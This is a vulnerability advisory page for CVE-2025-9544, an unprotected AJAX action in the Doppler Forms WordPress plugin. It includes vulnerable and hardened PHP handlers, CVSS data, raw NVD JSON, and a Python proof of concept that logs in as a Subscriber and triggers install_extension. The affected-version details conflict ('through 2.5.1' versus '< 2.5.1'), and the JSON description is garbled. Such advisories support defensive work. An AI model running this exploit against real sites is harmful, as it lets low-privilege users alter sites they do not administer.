Security Vulnerability Report
CVE-2025-9544 CVSS 6.5 MEDIUM

CVE-2025-9544

Published: 2025-10-29 06:15:34
Last Modified: 2026-04-15 00:35:42

Description

The Doppler Forms WordPress plugin through 2.5.1 registers an AJAX action, install_extension, without verifying user capabilities or using a nonce. As a result, any authenticated user, including those with the Subscriber role, can install and activate additional plugins (limited to those whitelisted by the main Doppler Forms plugin).
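The description names two missing controls on one AJAX handler: no nonce (CSRF protection) and no capability check (authorization). The following is an added illustrative example written for this page, not the Doppler Forms plugin's own source; it shows the unprotected handler pattern beside the hardened form a plugin author would ship. The callback names, the `doppler_forms_install_extension` nonce action, the `df_do_install_and_activate` helper and the `$allowed_extensions` list are assumptions.

```php
<?php
// Added illustrative example, not the Doppler Forms plugin's code.
// Function names, the nonce action string and the allow-list are assumptions.

// Placeholder for the plugin's real installer/activator (assumed helper).
function df_do_install_and_activate( $extension ) {
    // The real plugin would download, install and activate the extension here.
    return true;
}

// UNPROTECTED PATTERN, matching what the CVE description says the plugin did:
// wp_ajax_* runs for every logged-in user, and nothing in the callback checks
// a nonce or a capability, so a Subscriber account can reach the installer.
function df_install_extension_unprotected() {
    $extension = isset( $_POST['extension'] ) ? sanitize_key( wp_unslash( $_POST['extension'] ) ) : '';
    df_do_install_and_activate( $extension );
    wp_send_json_success( 'installed' );
}
// add_action( 'wp_ajax_install_extension', 'df_install_extension_unprotected' ); // the vulnerable wiring, left unregistered here

// HARDENED PATTERN: verify the nonce, then the capability, then the input.
function df_install_extension_hardened() {
    // 1. CSRF protection: the request must carry a nonce minted for this action.
    //    check_ajax_referer() calls wp_die() on failure, so execution stops here.
    check_ajax_referer( 'doppler_forms_install_extension', '_ajax_nonce' );

    // 2. Authorization: installing and activating plugins is an admin-level task.
    //    A Subscriber has neither capability, so the request ends with HTTP 403.
    if ( ! current_user_can( 'install_plugins' ) || ! current_user_can( 'activate_plugins' ) ) {
        wp_send_json_error( 'insufficient permissions', 403 );
    }

    // 3. Input validation: accept only names from a fixed allow-list, compared strictly.
    $allowed_extensions = array( 'example_extension' ); // assumed allow-list
    $extension = isset( $_POST['extension'] ) ? sanitize_key( wp_unslash( $_POST['extension'] ) ) : '';
    if ( ! in_array( $extension, $allowed_extensions, true ) ) {
        wp_send_json_error( 'unknown extension', 400 );
    }

    df_do_install_and_activate( $extension );
    wp_send_json_success( 'installed' );
}
add_action( 'wp_ajax_install_extension', 'df_install_extension_hardened' );

// The matching nonce is minted server-side into the admin page that offers the
// button, so only a page rendered for a legitimate session carries a valid value:
// wp_localize_script( 'df-admin', 'dfAjax', array(
//     'nonce' => wp_create_nonce( 'doppler_forms_install_extension' ),
// ) );
```

The order of the checks matters: the nonce check first rejects cross-site requests before any user-specific logic runs, and the capability check ties the action to the same privilege WordPress itself requires for plugin installation, so the handler cannot be reached by roles the core would refuse.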

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Doppler Forms WordPress Plugin < 2.5.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-9544 PoC - Doppler Forms Plugin Privilege Escalation
# Target: WordPress site with Doppler Forms plugin < 2.5.1
target = sys.argv[1] if len(sys.argv) > 1 else 'http://target-wordpress-site.com'
username = sys.argv[2] if len(sys.argv) > 2 else 'subscriber'
password = sys.argv[3] if len(sys.argv) > 3 else 'password'

# WordPress login to get authentication cookies
login_url = f'{target}/wp-login.php'
session = requests.Session()
login_data = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'redirect_to': '/wp-admin/',
    'testcookie': '1'
}

print(f'[*] Logging in as {username}...')
resp = session.post(login_url, data=login_data, allow_redirects=False)
if 'wordpress_logged_in' not in str(session.cookies) and resp.status_code != 302:
    print('[-] Login failed!')
    sys.exit(1)
print('[+] Login successful!')

# Exploit the install_extension AJAX action
ajax_url = f'{target}/wp-admin/admin-ajax.php'
exploit_data = {
    'action': 'install_extension',
    'extension': 'example_extension'  # Whitelisted extension name
}

print('[*] Exploiting CVE-2025-9544...')
resp = session.post(ajax_url, data=exploit_data)
if resp.status_code == 200 and 'success' in resp.text.lower():
    print('[+] Exploitation successful! Extension installation triggered.')
    print(f'[+] Response: {resp.text[:200]}')
else:
    print('[-] Exploitation may have failed.')
    print(f'[*] Status: {resp.status_code}')
    print(f'[*] Response: {resp.text[:200]}')
```

References

WPScan advisory: https://wpscan.com/vulnerability/06312fba-dfc5-47af-afe3-b01d8941acbf/
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9544", "sourceIdentifier": "[email protected]", "published": "2025-10-29T06:15:33.647", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Doppler Forms WordPress plugin through 2.5.1 registers an AJAX action install_extension without verifying user capabilities or using a nonce. As a result, any authenticated user — including those with the Subscriber role — can install and activate additional Doppler Forms WordPress plugin through 2.5.1 (limited to those whitelisted by the main Doppler Forms WordPress plugin through 2.5.1)."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "references": [{"url": "https://wpscan.com/vulnerability/06312fba-dfc5-47af-afe3-b01d8941acbf/", "source": "[email protected]"}]}}